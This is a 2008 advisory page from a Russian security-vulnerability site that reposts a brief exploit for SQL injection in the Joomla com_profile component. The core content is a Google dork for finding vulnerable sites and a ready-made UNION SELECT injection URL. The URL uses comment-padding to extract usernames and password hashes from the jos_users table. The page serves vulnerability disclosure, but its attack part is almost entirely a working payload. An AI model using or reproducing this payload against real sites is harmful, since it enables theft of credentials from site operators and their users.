Computer Security

Security Advisory: joomla SQL Injection(com_profile)
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  joomla SQL Injection(com_ric
ette)

  joomla SQL Injection (cat)(com
_downloads)

  Simple CMS <= 1.0.3 (indexen.php area) Remote SQL Injection Exploit

  RunCMS 1.6.1 Multiple XSS and XSRF Vulnerabilties

From:hackturkiye.hackturkiye_(at)_gmail.com <hackturkiye.hackturkiye_(at)_gmail.com>
Date:18.02.2008
Subject:joomla SQL Injection(com_profile)

###############################################################
#
#   joomla SQL Injection(com_profile)
#
###############################################################
#
# AUTHOR : S@BUN
#
# HOME 1 : http://www.milw0rm.com/author/1334
#   
# MAİL : hackturkiye.hackturkiye@gmail.com
#        
################################################################
#
#  DORK 1 : allinurl: com_profile
#
#  DORK 2 : allinurl:
#
################################################################
  EXPLOIT :

index.
php?option=com_profile&Itemid=s@bun&task=&task=viewoffer&oid=9999
999/**/union/**/select/**/concat(username,0x3a,
password)/**/from/**/jos_users/*


################################################################
# S@BUN           i AM NOT HACKER      S@BUN
################################################################
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru